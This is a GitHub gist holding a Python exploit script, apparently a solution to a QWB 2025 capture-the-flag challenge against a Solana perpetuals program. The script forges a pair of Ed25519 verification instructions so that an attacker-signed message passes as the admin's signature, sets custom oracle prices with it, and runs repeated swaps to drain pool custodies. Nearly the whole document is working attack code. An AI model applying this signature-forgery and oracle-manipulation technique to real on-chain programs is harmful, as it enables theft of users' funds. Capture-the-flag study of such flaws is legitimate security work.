Skip to content

Instantly share code, notes, and snippets.

@lbr77
Created November 24, 2025 17:30
Show Gist options
  • Select an option

  • Save lbr77/97d96fe9e8167454e9118d4dd567e43e to your computer and use it in GitHub Desktop.

Select an option

Save lbr77/97d96fe9e8167454e9118d4dd567e43e to your computer and use it in GitHub Desktop.
qwb 2025 perpetual exp
from pwn import *
import json
import struct
import sys
import time
import urllib.request
from solders.pubkey import Pubkey
from solders.keypair import Keypair
from solders.instruction import Instruction, AccountMeta
from solders.system_program import ID as SYS_PROGRAM_ID
from solders.sysvar import INSTRUCTIONS as SYSVAR_INSTRUCTIONS_ID
# import subprocess
# print = lambda *a, **k: None
# p = subprocess.Popen(["orb", "./challege_server"],stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# time.sleep(1)
# Only let pwntools log messages of level "error" through.
context.log_level = "error"
# Well-known program IDs: the Ed25519 signature-verification program, the SPL
# Token program and the SPL Associated Token Account program.
ED25519_PROGRAM_ID = Pubkey.from_string("Ed25519SigVerify111111111111111111111111111")
SPL_TOKEN_ID = Pubkey.from_string("TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA")
SPL_ASSOCIATED_TOKEN_ID = Pubkey.from_string("ATokenGPvbdGVxr1b2hvZbsiqW5xWH25efTNsLJA8knL")
# 8-byte prefixes that are prepended to the instruction data sent to the
# challenge program (presumably Anchor instruction discriminators -- confirm
# against the program's IDL).
IX_SET_CUSTOM_ORACLE_PRICE = bytes([0xef, 0x2b, 0x41, 0x94, 0xe1, 0x85, 0x6d, 0x9c])
IX_SWAP = bytes([0xf8, 0xc6, 0x9e, 0x91, 0xe1, 0x75, 0x87, 0xc8])
# NOTE(review): presumably the decimals of mint1 / mint2; neither constant is
# referenced anywhere in the visible part of this file.
R1_DECIMALS = 9
R2_DECIMALS = 6
class SolanaClient:
    """Line-oriented client for the challenge server's transaction prompt.

    The server is driven through a pwntools tube: it prints prompts such as
    ``num instructions:`` / ``program:`` / ``num accounts:`` / ``ix len:`` and
    this class answers each of them in turn.
    """

    # Banner labels consumed (and discarded) after every reconnect, in order.
    _BANNER_PREFIXES = ("Player:", "Admin:", "Mint1:", "Mint2:")

    def __init__(self, host, port):
        """Open a connection to ``host:port`` and remember the endpoint."""
        self.host = host
        self.port = port
        self.r = remote(host, port)

    def close(self):
        """Close the current connection."""
        self.r.close()

    def reconnect(self):
        """Drop the current connection, open a new one and skip its banner."""
        self.close()
        self.r = remote(self.host, self.port)
        # Every fresh connection prints the banner again; read past it so the
        # next prompt seen is the transaction prompt.
        for prefix in self._BANNER_PREFIXES:
            self.read_banner_key(prefix)

    def read_banner_key(self, prefix):
        """Read up to ``prefix`` and parse the rest of that line as a Pubkey."""
        self.r.recvuntil(prefix.encode())
        text = self.r.recvline().decode().strip()
        return Pubkey.from_string(text)

    def send_transaction(self, ixs):
        """Send the instruction count followed by every instruction in ``ixs``."""
        self.r.recvuntil(b"num instructions:")
        self.r.sendline(str(len(ixs)).encode())
        for ix in ixs:
            self.send_instruction(ix)

    def send_instruction(self, ix):
        """Answer the per-instruction prompts for a single instruction.

        Each account is sent as ``"<tag> <pubkey>"`` where the tag is ``w`` or
        ``r`` (writable / read-only) with an ``s`` appended for signers. The
        instruction data is sent raw, preceded by its length.
        """
        self.r.recvuntil(b"program:")
        self.r.sendline(str(ix.program_id).encode())

        self.r.recvuntil(b"num accounts:")
        self.r.sendline(str(len(ix.accounts)).encode())
        for acc in ix.accounts:
            tag = "w" if acc.is_writable else "r"
            if acc.is_signer:
                tag += "s"
            self.r.sendline(f"{tag} {acc.pubkey}".encode())

        self.r.recvuntil(b"ix len:")
        self.r.sendline(str(len(ix.data)).encode())
        # No trailing newline here: the server was told the exact byte count.
        self.r.send(ix.data)
def get_associated_token_address(owner, mint):
    """Return the associated token account address of ``owner`` for ``mint``.

    The address is the program-derived address of the Associated Token
    Account program for the seeds ``[owner, SPL token program id, mint]``;
    the bump seed returned alongside it is discarded.
    """
    seeds = [bytes(owner), bytes(SPL_TOKEN_ID), bytes(mint)]
    address, _bump = Pubkey.find_program_address(seeds, SPL_ASSOCIATED_TOKEN_ID)
    return address
def serialize_params(custody, price, expo, conf, ema, publish_time):
    """Serialize the oracle-price parameters into their wire format.

    Layout (little-endian, no padding): the raw bytes of ``custody``, then
    ``price`` (u64), ``expo`` (i32), ``conf`` (u64), ``ema`` (u64) and
    ``publish_time`` (i64).

    Raises:
        struct.error: if a value does not fit its fixed-width field.
    """
    # "<" selects standard sizes without alignment, so one pack call yields
    # exactly the same bytes as packing every field separately.
    return bytes(custody) + struct.pack(
        "<QiQQq", price, expo, conf, ema, publish_time
    )
def forge_ed25519_pair(admin_pubkey: Pubkey, params_bytes: bytes, attacker_keypair: Keypair):
    """Build the two Ed25519-program instructions used by the solve script.

    Both instructions start with the same 16-byte header: a signature count
    of 1, one padding byte and seven little-endian u16 fields (signature
    offset, signature instruction index, public-key offset, public-key
    instruction index, message offset, message size, message instruction
    index).

    * ``real_ix`` is self-contained: its three instruction indices are
      ``0xFFFF`` (the instruction itself) and its payload is
      ``signature | attacker public key | message``, where the signature is
      produced by ``attacker_keypair`` over ``params_bytes``.
    * ``fake_ix`` uses the same offsets but instruction index ``1`` for all
      three fields, so the caller must place ``real_ix`` as the second
      instruction of the transaction. Its own payload area carries
      ``admin_pubkey`` at bytes 16..48 and the message from byte 112 on.

    Args:
        admin_pubkey: key written into the payload area of ``fake_ix``.
        params_bytes: message that is signed and embedded in both instructions.
        attacker_keypair: keypair that actually signs ``params_bytes``.

    Returns:
        ``(fake_ix, real_ix)``.
    """
    msg = params_bytes
    # Convert the solders wrapper types into plain bytes.
    sig = bytes(attacker_keypair.sign_message(msg))
    attacker_pubkey_bytes = bytes(attacker_keypair.pubkey())
    admin_pubkey_bytes = bytes(admin_pubkey)

    # Payload offsets right after the 16-byte header.
    sig_offset = 16
    pk_offset = sig_offset + len(sig)  # 16 + 64 = 80
    msg_offset = pk_offset + len(attacker_pubkey_bytes)  # 80 + 32 = 112

    header_fmt = "<BB7H"  # num_signatures, padding, 7 x u16 descriptor fields
    this_ix = 0xFFFF  # "data lives in this very instruction"

    # real_ix: header, then real signature | attacker pubkey | message.
    real_header = struct.pack(
        header_fmt,
        1, 0,
        sig_offset, this_ix,
        pk_offset, this_ix,
        msg_offset, len(msg), this_ix,
    )
    real_data = real_header + sig + attacker_pubkey_bytes + msg
    real_ix = Instruction(ED25519_PROGRAM_ID, real_data, [])

    # fake_ix: zero-filled buffer that always reaches at least byte 112 plus
    # the message, because the message is written at that fixed position.
    fake_data = bytearray(max(msg_offset, 112) + len(msg))
    real_ix_index = 1  # position of real_ix inside the transaction
    struct.pack_into(
        header_fmt, fake_data, 0,
        1, 0,
        sig_offset, real_ix_index,
        pk_offset, real_ix_index,
        msg_offset, len(msg), real_ix_index,
    )
    # Original author's note: the perpetuals program reads these fields from
    # fixed slices of the instruction data.
    fake_data[16:48] = admin_pubkey_bytes
    fake_data[112:112 + len(msg)] = msg
    fake_ix = Instruction(ED25519_PROGRAM_ID, bytes(fake_data), [])

    return fake_ix, real_ix
# -------------------------------------------------------------------------
# Custody limit calculation
# -------------------------------------------------------------------------
def compute_safe_amount_in(
    free_out_tokens,
    dec_in, dec_out,
    price_in, expo_in,
    price_out, expo_out,
    safety
):
    """Estimate an input amount whose swap output fits the free output tokens.

    The free output amount is scaled by ``10 ** dec_out``, converted through
    the price ratio ``(price_out * 10**expo_out) / (price_in * 10**expo_in)``,
    rescaled by ``10 ** (dec_in - dec_out)`` and multiplied by ``safety``.

    Returns:
        ``0`` when ``free_out_tokens`` or either effective price is not
        positive; otherwise the estimate truncated to an int, clamped to the
        range ``[1, 2**63 - 1]``.
    """
    if free_out_tokens <= 0:
        return 0

    free_out_lamports = free_out_tokens * (10 ** dec_out)
    unit_price_in = price_in * (10 ** expo_in)
    unit_price_out = price_out * (10 ** expo_out)
    if unit_price_in <= 0 or unit_price_out <= 0:
        return 0

    scale = 10 ** (dec_in - dec_out)
    max_in = free_out_lamports * (unit_price_out / unit_price_in) * scale
    max_in *= safety

    upper_bound = 2**63 - 1
    if max_in > upper_bound:
        max_in = upper_bound
    if max_in < 1:
        # Never suggest a zero-sized swap once there is anything to take.
        return 1
    return int(max_in)
# Oracle settings (price1, expo1, price2, expo2) applied to custody1 and
# custody2 before every swap of the given direction.
_A2B_PRICES = (1_000_000_000, -7, 1_000_000_000, -5)
_B2A_PRICES = (1_000_000_000, -3, 1_000_000_000, -6)

# Every "A-B" batch consists of this many swaps.
_A2B_ROUNDS = 7

# Swap schedule: (A-B amount, B-A amount, B-A round count for each cycle).
# One cycle is an A-B batch of _A2B_ROUNDS swaps followed by a B-A batch.
_SWAP_SCHEDULE = (
    (100_000, 10_000_000, (6,) + (7,) * 13),
    (10_000, 1_000_000, (20, 12) + (7,) * 8),
    (1_000, 100_000, (20, 8, 7)),
    (100, 10_000, (7,) * 7),
)


def _drive_session(client, host):
    """Run the whole instruction sequence against an already-open client.

    Reads the banner keys, creates the player's two associated token
    accounts, then alternates oracle updates and swaps according to
    ``_SWAP_SCHEDULE``, printing the metrics reported by the server's
    ``/metrics`` endpoint after every swap.
    """
    player = client.read_banner_key("Player:")
    admin = client.read_banner_key("Admin:")
    mint1 = client.read_banner_key("Mint1:")
    mint2 = client.read_banner_key("Mint2:")

    program_id = Pubkey.from_string("Bmr31xzZYYVUdoHmAJL1DAp2anaitW8Tw9YfASS94MKJ")

    def pda(*seeds):
        # Program-derived address of the challenge program (bump discarded).
        return Pubkey.find_program_address(list(seeds), program_id)[0]

    perpetuals_pda = pda(b"perpetuals")
    transfer_authority_pda = pda(b"transfer_authority")
    pool_pda = pda(b"pool", b"test pool")

    def accounts_for(mint):
        # All per-mint accounts a swap or an oracle update needs.
        tail = (bytes(pool_pda), bytes(mint))
        return {
            "mint": mint,
            "custody": pda(b"custody", *tail),
            "token": pda(b"custody_token_account", *tail),
            "oracle": pda(b"oracle_account", *tail),
            "ata": get_associated_token_address(player, mint),
        }

    side1 = accounts_for(mint1)
    side2 = accounts_for(mint2)

    create_ata_data = bytes([1])  # CreateIdempotent

    def make_create_ata_ix(side):
        return Instruction(
            SPL_ASSOCIATED_TOKEN_ID,
            create_ata_data,
            [
                AccountMeta(player, True, True),  # funding (signer)
                AccountMeta(side["ata"], False, True),  # ata
                AccountMeta(player, False, False),  # owner
                AccountMeta(side["mint"], False, False),  # mint
                AccountMeta(SYS_PROGRAM_ID, False, False),
                AccountMeta(SPL_TOKEN_ID, False, False),
            ],
        )

    client.send_transaction([make_create_ata_ix(side1), make_create_ata_ix(side2)])
    client.reconnect()

    # Fresh signing key for the Ed25519 instruction pair.
    attacker_keypair = Keypair()

    ts_base = int(time.time())

    def fresh_ts():
        # Strictly increasing timestamp, never behind the wall clock.
        nonlocal ts_base
        ts_base = max(ts_base + 1, int(time.time()))
        return ts_base

    def set_oracle(side, price, expo):
        # conf is fixed to 1 and ema mirrors the price.
        params = serialize_params(side["custody"], price, expo, 1, price, fresh_ts())
        fake, real = forge_ed25519_pair(admin, params, attacker_keypair)
        ix = Instruction(program_id, IX_SET_CUSTOM_ORACLE_PRICE + params, [
            AccountMeta(perpetuals_pda, False, False),
            AccountMeta(pool_pda, False, False),
            AccountMeta(side["custody"], False, False),
            AccountMeta(side["oracle"], False, True),
            AccountMeta(SYSVAR_INSTRUCTIONS_ID, False, False),
        ])
        # Order matters: fake_ix refers to instruction index 1 (real_ix).
        client.send_transaction([fake, real, ix])
        client.reconnect()

    def swap(src, dst, amount):
        # Swap `amount` from the src mint into the dst mint. The second u64
        # is always 0 (presumably the minimum amount out -- confirm).
        data = IX_SWAP + struct.pack("<QQ", amount, 0)
        ix = Instruction(program_id, data, [
            AccountMeta(player, True, True),
            AccountMeta(src["ata"], False, True),
            AccountMeta(dst["ata"], False, True),
            AccountMeta(transfer_authority_pda, False, False),
            AccountMeta(perpetuals_pda, False, False),
            AccountMeta(pool_pda, False, True),
            AccountMeta(src["custody"], False, True),
            AccountMeta(src["oracle"], False, False),
            AccountMeta(src["token"], False, True),
            AccountMeta(dst["custody"], False, True),
            AccountMeta(dst["oracle"], False, False),
            AccountMeta(dst["token"], False, True),
            AccountMeta(SPL_TOKEN_ID, False, False),
        ])
        client.send_transaction([ix])
        client.reconnect()

    def fetch_metrics():
        url = f"http://{host}:8080/metrics"
        # Close the HTTP response deterministically instead of leaking it.
        with urllib.request.urlopen(url) as resp:
            data = json.loads(resp.read().decode())
        return float(data["custody1"]), float(data["custody2"]), float(data["aum"])

    def run_batch(label, src, dst, amount, times, prices):
        p1, e1, p2, e2 = prices
        for _ in range(times):
            set_oracle(side1, p1, e1)
            set_oracle(side2, p2, e2)
            swap(src, dst, amount)
            c1, c2, aum = fetch_metrics()
            print(f"{label} {c1=} {c2=} {aum=}")
            time.sleep(0.1)

    # Initial step: one mint1 -> mint2 swap under its own oracle settings.
    set_oracle(side1, 1_000_000_000, -3)
    set_oracle(side2, 1_000_000_000, -9)
    swap(side1, side2, 900)
    fetch_metrics()  # result unused; kept so the request sequence is unchanged

    for a2b_amount, b2a_amount, b2a_round_counts in _SWAP_SCHEDULE:
        for b2a_rounds in b2a_round_counts:
            # "A-B" swaps mint2 -> mint1, "B-A" swaps mint1 -> mint2.
            run_batch("A-B", side2, side1, a2b_amount, _A2B_ROUNDS, _A2B_PRICES)
            run_batch("B-A", side1, side2, b2a_amount, b2a_rounds, _B2A_PRICES)

    # Finish the session by submitting a transaction with zero instructions.
    client.send_transaction([])


def main():
    """Connect to the challenge server and run the full swap schedule.

    The connection is closed even if a step raises.
    """
    # host, port = "10.10.10.80", 1337
    # host, port = "192.168.2.94", 1337
    host, port = "127.0.0.1", 1337
    client = SolanaClient(host, port)
    try:
        _drive_session(client, host)
    finally:
        client.close()


if __name__ == "__main__":
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment